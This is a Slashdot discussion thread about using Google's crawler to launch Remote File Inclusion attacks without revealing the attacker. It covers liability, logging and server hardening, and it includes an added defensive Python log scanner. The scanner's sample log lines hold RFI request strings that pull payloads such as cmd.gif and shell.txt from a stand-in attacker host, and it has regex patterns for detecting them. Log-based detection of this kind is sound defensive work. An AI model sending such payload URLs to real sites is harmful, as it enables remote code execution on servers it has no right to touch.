Anonymizing RFI Attacks Through Google
netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."
but is it a crime... (Score:5, Interesting)
If I happen to create a utility capable of cracking a site but then store it for research, never distribute it and never actively use it, then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present it's only the person who actively uses it that is guilty of a crime.
However, in this scenario (even if I could be traced) it's arguable that *I* never attacked a site; all I did was to place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent amendment to the UK's Computer Misuse Act (i.e. reasonable belief that the tool would not be used in that fashion), but still...
As always it comes down to people...
PS:
As an aside, I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 Amazon voucher) then please take a look at:
https://msc-survery.priogenus.com/amazon.php [priogenus.com]
Re: (Score:2, Interesting)
Re: (Score:2, Interesting)
Re: (Score:1)
Re: (Score:1)
But I'm still not sure I agree; it might be equivalent to choosing to store your own rat poison in your own teapot in a flat that you didn't lock.... I'm certainly not saying it's morally ok, but it's probably closer to reckless endangerment than anything else.
Re: (Score:2, Funny)
Are you new to slashdot? The proper way to phrase this....ummmm...phrase is as follows:
My father's a vicar you insensitive clod!
Re: (Score:2)
Re: (Score:3, Insightful)
I'll preface this by saying IANAL...
Prove? No. Provide circumstantial evidence? Yup.
As the grandparent stated, the real judgment behind this crime is one of intent. The nature of these links is so specific, targeted and intentional, that even if one didn't get accused of willful attacking, he'd be guilty of negligence.
Maybe it doesn't seem as clear-cut because we're "j
Re: (Score:2)
However, in this scenario (even if I could be traced) it's arguable that *I* never attacked a site; all I did was to place a tool that could be used in that way in a public location.
IANAL, but it seems to me that there is a long history of "public nuisance" and "reckless endangerment" in common law [wikipedia.org] that could be applied here (at least in countries like the UK and the USA whose legal systems are grounded on common law).
At present, if you created such a link and I discovered your link was accessible from
Anonymous? (Score:4, Informative)
Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code (but perhaps not who triggered it).
Re:Anonymous? (Score:4, Informative)
At least that's what I usually see every time I check the logs of a website I'm going to shut down for allowing foreign includes (to be run).
Re: (Score:2)
This seems like something clever and pointless just for the sake of it.
Re: (Score:1)
http://www.google.com/search?q=linkto%3Aslashdot.
Re: (Score:1)
http://www.google.com/search?as_lq=slashdot.org&b
Re: (Score:2)
Nope, googlebot doesn't fill in the referer :-(
However, it's not anonymous either. You can bet that if the victim server's admin understands how this was done, he will have no problem getting the relevant data from google's log, and there goes your little scheme!
So, this trick should never be used "on its own". It's still useful however, and here's how:
Don't pu
change behaviour for bots (Score:4, Informative)
Here [robotstxt.org] you have a db of web robots.
Re: (Score:1, Interesting)
Re: (Score:1)
Excluding google usually causes more issues (especially when management chirp up and say why aren't we being indexed).
This is a problem between google and the destination site.
Google are the ones here that are not verifying the URLs and attempting to use bad links.
The destination site should be using the best web server they can which is known to handle these kind of problems properly.
The web is broken in so many ways, google should have a good idea which are well
Re: (Score:2)
Googlebot presumes all provided links are good until it touches each one and sees the response header. If a 200 or 302 comes back, obviously it's a valid URL handled by the server. Whether the target of that URL is malicious or not is not really for Google to determine; all they do is crawl linked and submitted sites via an automated process. The responsibility is shared between Microsoft and the server admin to ensure
In reality... (Score:2, Insightful)
Reminds me of this post (Score:2)
Glasshouses... (Score:3, Informative)
RFI (Score:2)
Could someone define the RFI acronym? Neither the summary, article or google can explain it clearly.
Re: (Score:2, Informative)
Remote File Inclusion (Score:5, Informative)
Remote File Inclusion. It's a pretty poor term for this type of attack, because it's not the act of inclusion that causes the problem, it's the act of requesting the file in the first place.
Re: (Score:2)
Here's [uni-stuttgart.de] an example of an RFI attack designed to exploit a bit of sloppy coding in PHP Nuke.
Re: (Score:1)
Re: (Score:1)
Re: (Score:1)
Re: (Score:2)
It's a pretty good acronym if you actually are discussing including files. However, this attack is like me linking to http://site.com/database.php?hack-in-querystring [site.com] which has nothing to do with including remote files. Both bots and humans could follow that link and "attack" the site.
Re: (Score:1)
(nothing wrong with narrow subcultures, btw. nerds of any flavor are okay most times)
How not Who (Score:5, Informative)
Re: (Score:2, Interesting)
RFI? How about defining this? (Score:5, Informative)
Radio Frequency Interference? Request for Information? Radio France Internationale? Rodent Fangs Implementation? WHAT?
How about explaining what such an ambiguous acronym actually means initially. As neither TFA nor the summary seems to have done so, I therefore will have to do it here, just to make heads and tails of the rest of the discussion and perhaps illuminate someone else. Hit Google, slog through a pile of links indicating one of the above, or some company whose name includes the three letters. There are many of these. On page 3 I found the Wikipedia page for this TLA, on which there is a dead link to what this must be: Remote File Inclusion.
How about that.
I was wondering if it was just me, that I had been off-line for too long (like 2 days) and missed out on the latest and greatest buzzword, again?
Re: (Score:1)
Re: (Score:2, Funny)
Re: (Score:2)
Re:RFI? How about defining this? (Score:4, Informative)
The description of the mechanism doesn't really make sense. If you can exploit a victim site by feeding it an evil URL in a form parameter, why use Google at all? You've lost anonymity by including the URL.
Looking at the described effects, it sounds like what they do is feed google some malicious code wrapped up in something that looks like a URL on the victim site. Then Google spiders the URL, placing malicious content in the form parameters.
So, suppose you have a malicious SQL injection attack that causes your database to dump the password table to a remote database. The trick is that you get Google to launch the attack for you. You have the malicious code obfuscate the destination, and it isn't clear skullduggery is going on by casual inspection of the logs. It won't show up in the database logs either, because it's not a transaction.
Re: (Score:1)
The interesting part was that the goal of the "attacker" was not to run an exploit against our machines but to attempt to inject a link into the page that
Simple solution (Score:5, Interesting)
Seriously, I hate to read articles like this one. They don't offer any solution..... These kinds of attacks are not new at all; you can find tons of such attacks in the access.log file:
tail -f /var/log/httpd/access.log
First, get rid of fat Apache and use a small and secure server like lighttpd if you are running a *small personal* web site. Second, put lighttpd / Apache in a chrooted jail and no one can install a *php/perl* shell. I have documented the procedure for putting lighttpd in a jail:
http://www.cyberciti.biz/tips/howto-setup-lighttp
Both Yahoo and Google run their entire web servers in chrooted jails. Another choice is to use OpenBSD, which runs Apache in a chrooted jail out of the box.
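The post above points at access.log as the place where these attacks show up. As an added example (not from the post or the article), here is the check a defender would run over those lines: flag any request whose query-string parameter is itself an absolute URL, record which remote host is serving the payload, and note whether the requester was a crawler (in which case the client IP is not the attacker). The log lines, IP addresses and hostnames are constructed; the crawler user-agent tokens are assumed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache/lighttpd "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter whose value is itself an absolute URL is the RFI signature: the
# application is being told which remote file to fetch and include.
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
CRAWLER_RE = re.compile(r'googlebot|slurp|msnbot', re.IGNORECASE)  # assumed UA tokens

def find_rfi_attempts(lines):
    """One record per request whose query string carries a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        for key, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "client": m["ip"],
                    "status": int(m["status"]),
                    "param": key,
                    "remote_host": urlsplit(value).hostname,
                    # a crawler as requester means the client IP is not the
                    # attacker; the remote_host is the lead worth following
                    "via_crawler": bool(CRAWLER_RE.search(m["ua"])),
                })
    return hits

def payload_hosts(hits):
    """Count which remote hosts are serving the included payloads."""
    return Counter(h["remote_host"] for h in hits)

# Constructed sample lines (documentation IP ranges, .example domain).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2007:12:00:01 +0000] "GET /modules.php?name=News&file=http://evil.example/cmd.gif? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.7 - - [10/Mar/2007:12:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Mar/2007:12:00:09 +0000] "GET /index.php?page=ftp://203.0.113.9/shell.txt HTTP/1.1" 500 0 "-" "curl/7.15"
"""

if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG.splitlines())
    for hit in hits:
        print(hit)
    print(payload_hosts(hits))
```

A 200 on a flagged request deserves more attention than a 500: it suggests the application fetched and ran the remote file rather than failing on it.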
Re: (Score:2)
Yes, you are correct that such a setup will save you from certain attacks, however this isn't an alternative for proper, secure coding. Besides, anyone still using system() via a webserver (be it Apache or LightTPD) should be shot, regardless.
Re: (Score:2)
How so? You'll also need to install the PHP libs and old Mambo package inside the jail and run as non-root. Are you saying that PHP+Mambo can break outside a chrooted jail in OpenBSD? Worst case, they hack the jail but your base system hasn't been compromised.
don't need google (Score:1)
Re: (Score:2)
Anyway you can turn on the preview feature for tinyurl - so it displays the url first without taking you straight to it. I recommend that.
But the other url shortening services may not have such a feature.
Anyway, if you do the attack mentioned in the article it might be a good idea to use tinyurl or other similar sites, so that it is google and friends that expand the resulting url, so it is harder for the victim to figure out who hosted the original shortened url - since they on
In Soviet Russia - with a twist (Score:1)
I c-can't do it. *sob*. This is too easy. It's like taking candy from a baby. I'm sorry.
[walks away]
Against the System: Rise of the Robots (Score:1)
Prior art (Score:2)
It's not "HACKING WITH GOOGLE" it's using google (Score:1)
In the particular example it's searching in the code for where cmd.gif is, to use it to enable malicious code via a remote site.
It's not like using Google to hack a specific site, but just those sites which are vulnerable (it's like searching for which site has phpBB 2.6 and using known exploits to "hack it" (with SQL injection or something).
This discovery is for script kiddies, not for real hackers who wants to hack a specif
no - doesn't require searching. (Score:1)
The article suggests searching for cmd.gif to demonstrate that the method is being used, and indeed some of the results show that Google's index carries URLs containing attacks.
To inject those urls into google's index the attacker doesn't even need to run a search or even contact google a single time - he puts the attack (mentioning the specific host the attacker wants to attack) on some webpage and then waits for google
Covert communications channel? (Score:2)
I studied this 3 years ago (Score:2)
In Other News (Score:2)
Remember, you heard it here first!